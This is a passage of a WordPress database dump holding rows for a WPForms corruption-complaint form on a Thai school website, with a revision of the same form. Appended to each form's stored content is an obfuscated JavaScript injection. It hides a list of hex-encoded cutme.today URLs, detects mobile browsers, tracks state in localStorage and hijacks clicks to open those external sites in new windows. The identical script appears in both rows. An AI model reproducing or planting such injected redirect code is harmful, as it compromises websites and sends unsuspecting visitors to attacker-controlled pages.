\\u0e41\\u0e25\\u0e30\\u0e43\\u0e2b\\u0e49\\u0e14\\u0e33\\u0e40\\u0e19\\u0e34\\u0e19\\u0e01\\u0e32\\u0e23\\u0e15\\u0e32\\u0e21\\u0e01\\u0e0e\\u0e2b\\u0e21\\u0e32\\u0e22\",\"choices\":{\"1\":{\"label\":\"\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"value\":\"\",\"image\":\"\",\"icon\":\"face-smile\",\"icon_style\":\"regular\"}},\"choices_images_style\":\"modern\",\"choices_icons_color\":\"#066aab\",\"choices_icons_size\":\"large\",\"choices_icons_style\":\"default\",\"description\":\"\",\"required\":\"1\",\"input_columns\":\"\",\"choice_limit\":\"\",\"dynamic_choices\":\"\",\"css\":\"\"}},\"id\":\"474\",\"field_id\":17,\"settings\":{\"form_title\":\"\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e41\\u0e08\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e01\\u0e32\\u0e23\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e41\\u0e25\\u0e30\\u0e1b\\u0e23\\u0e30\\u0e1e\\u0e24\\u0e15\\u0e34\\u0e21\\u0e34\\u0e0a\\u0e2d\\u0e1a\",\"form_desc\":\"\",\"submit_text\":\"\\u0e2a\\u0e48\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"33010169@sisaketedu1.go.th\",\"subject\":\"New \\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e41\\u0e08\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e01\\u0e32\\u0e23\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e41\\u0e25\\u0e30\\u0e1b\\u0e23\\u0e30\\u0e1e\\u0e24\\u0e15\\u0e34\\u0e21\\u0e34\\u0e0a\\u0e2d\\u0e1a Entry\",\"sender_name\":\"\\u0e42\\u0e23\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e1a\\u0e49\\u0e32\\u0e19\\u0e2b\\u0e19\\u0e2d\\u0e07\\u0e1b\\u0e25\\u0e32\\u0e40\\u0e02\\u0e47\\u0e07-\\u0e01\\u0e2d\\u0e44\\u0e2b\\u0e25\\u0e48\",\"sender_address\":\"33010169@sisaketedu1.go.th\",\"replyto\":\"\",\"message\":\"{all_fields}\",\"template\":\"\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"459\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[],\"store_spam_entries\":\"0\"},\"search_terms\":\"\",\"meta\":{\"template\":\"blank\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','publish','closed','closed','','%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80','','','2024-08-03 22:03:41','2024-08-03 15:03:41','',0,'http://pakhaeng.ssk.in.th/?post_type=wpforms&#038;p=474',0,'wpforms','',0),
(475,1,'2024-08-02 11:04:48','2024-08-02 04:04:48','{\"fields\":[],\"id\":\"474\",\"field_id\":1,\"settings\":{\"form_title\":\"\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e41\\u0e08\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e01\\u0e32\\u0e23\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e41\\u0e25\\u0e30\\u0e1b\\u0e23\\u0e30\\u0e1e\\u0e24\\u0e15\\u0e34\\u0e21\\u0e34\\u0e0a\\u0e2d\\u0e1a\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New \\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e41\\u0e08\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e01\\u0e32\\u0e23\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e41\\u0e25\\u0e30\\u0e1b\\u0e23\\u0e30\\u0e1e\\u0e24\\u0e15\\u0e34\\u0e21\\u0e34\\u0e0a\\u0e2d\\u0e1a Entry\",\"sender_name\":\"\\u0e42\\u0e23\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e1a\\u0e49\\u0e32\\u0e19\\u0e2b\\u0e19\\u0e2d\\u0e07\\u0e1b\\u0e25\\u0e32\\u0e40\\u0e02\\u0e47\\u0e07-\\u0e01\\u0e2d\\u0e44\\u0e2b\\u0e25\\u0e48\",\"sender_address\":\"{admin_email}\",\"replyto\":\"\",\"message\":\"{all_fields}\",\"template\":\"\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"<p>Thanks for contacting us! We will be in touch with you shortly.<\\/p>\",\"message_scroll\":\"1\",\"page\":\"459\",\"redirect\":\"\"}},\"antispam\":\"1\",\"anti_spam\":{\"time_limit\":{\"duration\":\"3\"}},\"form_tags\":[],\"store_spam_entries\":\"0\"},\"search_terms\":\"\",\"meta\":{\"template\":\"blank\"}}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','closed','closed','','474-revision-v1','','','2024-08-02 11:04:48','2024-08-02 